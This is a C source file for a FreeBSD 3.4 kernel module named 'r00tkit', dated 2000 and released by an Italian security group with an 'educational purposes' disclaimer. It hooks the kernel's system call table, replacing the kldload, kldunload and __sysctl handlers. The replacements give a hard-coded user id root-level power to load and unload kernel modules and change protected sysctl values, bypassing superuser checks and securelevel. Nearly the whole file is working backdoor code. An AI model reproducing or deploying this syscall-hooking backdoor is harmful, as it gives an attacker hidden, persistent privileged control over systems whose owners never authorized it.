/*
 * Date: Sat May 20 13:24:39 2000
 * Author: pIGpEN [ pigpen@s0ftpj.org, deadhead@sikurezza.org ]
 *
 * SoftProject 2000 - Digital Sekurity for Y2k
 * Sikurezza.org - Italian Security MailingList
 *
 * COFFEE-WARE LICENSE - This source code is like "THE BEER-WARE LICENSE" by
 * Poul-Henning Kamp <phk@FreeBSD.ORG> but you can give me in return a coffee.
 *
 * Tested on: FreeBSD 3.4-RELEASE FreeBSD 3.4-RELEASE #10: Thu Ma i386
 *
 * This kld gives you permission to:
 *
 * - load / unload a kld 	even if you aren't root (with a specific id)
 * 				and securelevel > 0
 * - modify a sysctl value 	"	"	"	"
 *
 * Note: with securelevel > 0 only FIGO can unload modules... bypassing
 * securelevel...
 *
 * This is only an example It's coded for educational purposes.. don't
 * use it!
 */

#define	FIGO	1000	/*	UID	*/


#include <sys/param.h>
#include <sys/proc.h>
#include <sys/malloc.h>
#include <sys/systm.h>
#include <sys/module.h>
#include <sys/kernel.h>
#include <sys/sysproto.h>
#include <sys/syscall.h>
#include <sys/sysent.h>
#include <sys/linker.h>

#include <vm/vm.h>
#include <vm/vm_extern.h>

#include <sys/buf.h>
#include <sys/sysctl.h>

static int	my_kldload	__P((struct proc *, struct kldload_args *));
static int	my_kldunload	__P((struct proc *, struct kldunload_args *));
static int	my__sysctl	__P((struct proc *, struct sysctl_args *));
static int	my_userland_sysctl
				__P((struct proc *, int *, u_int, void *,
				     size_t *, int, void *, size_t, size_t *));

static int	sysctl_old_user	__P((struct sysctl_req *, const void *, 
				     size_t));
static int 	sysctl_new_user	__P((struct sysctl_req *, void *, size_t));
				
static int 	sysctl_root	SYSCTL_HANDLER_ARGS;


static int
module_handler(module_t mod, int cmd, void *arg)
{
	switch(cmd) {
		case MOD_LOAD:
			sysent[SYS_kldload].sy_call = (sy_call_t *) my_kldload;
			sysent[SYS_kldunload].sy_call=(sy_call_t *)my_kldunload;
			sysent[SYS___sysctl].sy_call = (sy_call_t *)my__sysctl;
			break;
		case MOD_UNLOAD:
			sysent[SYS_kldload].sy_call = (sy_call_t *) kldload;
			sysent[SYS_kldunload].sy_call=(sy_call_t *) kldunload;
			sysent[SYS___sysctl].sy_call=(sy_call_t *) __sysctl;
			break;
	}
	
	return 0;
}

static moduledata_t rootkit = {
	"r00tkit",
	module_handler,
	NULL
};

DECLARE_MODULE(r00tkit, rootkit, SI_SUB_DRIVERS, SI_ORDER_MIDDLE);



/*
 * We give permissions to FIGO id of load / unload a module
 */

static int
my_kldload(struct proc *p, struct kldload_args* uap)
{
    char* filename = NULL, *modulename;
    linker_file_t lf;
    int error = 0;

    p->p_retval[0] = -1;

    if (securelevel > 0 && p->p_cred->p_ruid != FIGO)
	return EPERM;

    if ((error = suser(p->p_ucred, &p->p_acflag)) && p->p_cred->p_ruid != FIGO)
	return error;

    filename = malloc(MAXPATHLEN, M_TEMP, M_WAITOK);
    if ((error = copyinstr(SCARG(uap, file), filename, MAXPATHLEN, NULL)))
	goto out;

    /* Can't load more than one module with the same name */
    modulename = rindex(filename, '/');
    if (modulename == NULL)
	modulename = filename;
    if (linker_find_file_by_name(modulename)) {
	error = EEXIST;
	goto out;
    }

    if ((error = linker_load_file(filename, &lf)))
	goto out;

    lf->userrefs++;
    p->p_retval[0] = lf->id;

out:
    if (filename)
	free(filename, M_TEMP);
    return error;
}

static int
my_kldunload(struct proc *p, struct kldunload_args* uap)
{
    linker_file_t lf;
    int error = 0;

    if (securelevel > 0 && p->p_cred->p_ruid != FIGO)
	return EPERM;

    if ((error = suser(p->p_ucred, &p->p_acflag)) && p->p_cred->p_ruid != FIGO)
	return error;

    lf = linker_find_file_by_id(SCARG(uap, fileid));
    if (lf) {
	KLD_DPF(FILE, ("kldunload: lf->userrefs=%d\n", lf->userrefs));
	if (lf->userrefs == 0) {
	    printf("linkerunload: attempt to unload file which was not loaded by user\n");
	    error = EBUSY;
	    goto out;
	}
	error = linker_file_unload(lf);
	if (error)
	    goto out;
	lf->userrefs--;
    } else
	error = ENOENT;

out:
    return error;
}


static int
my__sysctl(struct proc *p, struct sysctl_args *uap)
{
	int error, i, name[CTL_MAXNAME];
	size_t j;

	if (uap->namelen > CTL_MAXNAME || uap->namelen < 2)
		return (EINVAL);

 	error = copyin(uap->name, &name, uap->namelen * sizeof(int));
 	if (error)
		return (error);

	error = my_userland_sysctl(p, name, uap->namelen,
		uap->old, uap->oldlenp, 0,
		uap->new, uap->newlen, &j);
	if (error && error != ENOMEM)
		return (error);
	if (uap->oldlenp) {
		i = copyout(&j, uap->oldlenp, sizeof(j));
		if (i)
			return (i);
	}
	return (error);
}

static struct sysctl_lock {
	int	sl_lock;
	int	sl_want;
	int	sl_locked;
} memlock;


/*
 * This is used from various compatibility syscalls too.  That's why name
 * must be in kernel space.
 *
 * pig: we change it only for __sysctl ... giving permissions to FIGO id
 */
static int
my_userland_sysctl(struct proc *p, int *name, u_int namelen, void *old, size_t *oldlenp, int inkernel, void *new, size_t newlen, size_t *retval)
{
	int error = 0;
	struct sysctl_req req, req2;

	bzero(&req, sizeof req);

	req.p = p;

	if (oldlenp) {
		if (inkernel) {
			req.oldlen = *oldlenp;
		} else {
			error = copyin(oldlenp, &req.oldlen, sizeof(*oldlenp));
			if (error)
				return (error);
		}
	}

	if (old) {
		if (!useracc(old, req.oldlen, B_WRITE))
			return (EFAULT);
		req.oldptr= old;
	}

	if (newlen) {
		if (!useracc(new, req.newlen, B_READ))
			return (EFAULT);
		req.newlen = newlen;
		req.newptr = new;
	}

	req.oldfunc = sysctl_old_user;
	req.newfunc = sysctl_new_user;
	req.lock = 1;

	/* XXX this should probably be done in a general way */
	while (memlock.sl_lock) {
		memlock.sl_want = 1;
		(void) tsleep((caddr_t)&memlock, PRIBIO+1, "sysctl", 0);
		memlock.sl_locked++;
	}
	memlock.sl_lock = 1;

	do {
	    req2 = req;
	    error = sysctl_root(0, name, namelen, &req2);
	} while (error == EAGAIN);

	req = req2;
	if (req.lock == 2)
		vsunlock(req.oldptr, req.oldlen, B_WRITE);

	memlock.sl_lock = 0;

	if (memlock.sl_want) {
		memlock.sl_want = 0;
		wakeup((caddr_t)&memlock);
	}

	if (error && error != ENOMEM)
		return (error);

	if (retval) {
		if (req.oldptr && req.oldidx > req.oldlen)
			*retval = req.oldlen;
		else
			*retval = req.oldidx;
	}
	return (error);
}
/*
 * Transfer function to/from user space.
 */
static int
sysctl_old_user(struct sysctl_req *req, const void *p, size_t l)
{
	int error = 0;
	size_t i = 0;

	if (req->lock == 1 && req->oldptr) {
		vslock(req->oldptr, req->oldlen);
		req->lock = 2;
	}
	if (req->oldptr) {
		i = l;
		if (i > req->oldlen - req->oldidx)
			i = req->oldlen - req->oldidx;
		if (i > 0)
			error = copyout(p, (char *)req->oldptr + req->oldidx,
					i);
	}
	req->oldidx += l;
	if (error)
		return (error);
	if (req->oldptr && i < l)
		return (ENOMEM);
	return (0);
}

static int
sysctl_new_user(struct sysctl_req *req, void *p, size_t l)
{
	int error;

	if (!req->newptr)
		return 0;
	if (req->newlen - req->newidx < l)
		return (EINVAL);
	error = copyin((char *)req->newptr + req->newidx, p, l);
	req->newidx += l;
	return (error);
}
/*
 * Traverse our tree, and find the right node, execute whatever it points
 * at, and return the resulting error code.
 */

extern struct linker_set sysctl_;

static int
sysctl_root SYSCTL_HANDLER_ARGS
{
	int *name = (int *) arg1;
	u_int namelen = arg2;
	int indx, i, j;
	struct sysctl_oid **oidpp;
	struct linker_set *lsp = &sysctl_;

	j = lsp->ls_length;
	oidpp = (struct sysctl_oid **) lsp->ls_items;

	indx = 0;
	while (j-- && indx < CTL_MAXNAME) {
		if (*oidpp && ((*oidpp)->oid_number == name[indx])) {
			indx++;
			if ((*oidpp)->oid_kind & CTLFLAG_NOLOCK)
				req->lock = 0;
			if (((*oidpp)->oid_kind & CTLTYPE) == CTLTYPE_NODE) {
				if ((*oidpp)->oid_handler)
					goto found;
				if (indx == namelen)
					return ENOENT;
				lsp = (struct linker_set*)(*oidpp)->oid_arg1;
				j = lsp->ls_length;
				oidpp = (struct sysctl_oid **)lsp->ls_items;
			} else {
				if (indx != namelen)
					return EISDIR;
				goto found;
			}
		} else {
			oidpp++;
		}
	}
	return ENOENT;
found:
	/* If writing isn't allowed */
	if (req->newptr && (!((*oidpp)->oid_kind & CTLFLAG_WR) ||
	    (((*oidpp)->oid_kind & CTLFLAG_SECURE) && securelevel > 0 &&
	     req->p->p_cred->p_ruid != FIGO)))
		return (EPERM);

	/* Most likely only root can write */
	/* pig: also FIGO user here :) */
	if (!((*oidpp)->oid_kind & CTLFLAG_ANYBODY) &&
	    req->newptr && req->p &&
	    (i = suser(req->p->p_ucred, &req->p->p_acflag)) &&
	    req->p->p_cred->p_ruid != FIGO)
		return (i);

	if (!(*oidpp)->oid_handler)
		return EINVAL;

	if (((*oidpp)->oid_kind & CTLTYPE) == CTLTYPE_NODE) {
		i = ((*oidpp)->oid_handler) (*oidpp,
					name + indx, namelen - indx,
					req);
	} else {
		i = ((*oidpp)->oid_handler) (*oidpp,
					(*oidpp)->oid_arg1, (*oidpp)->oid_arg2,
					req);
	}
	return (i);
}
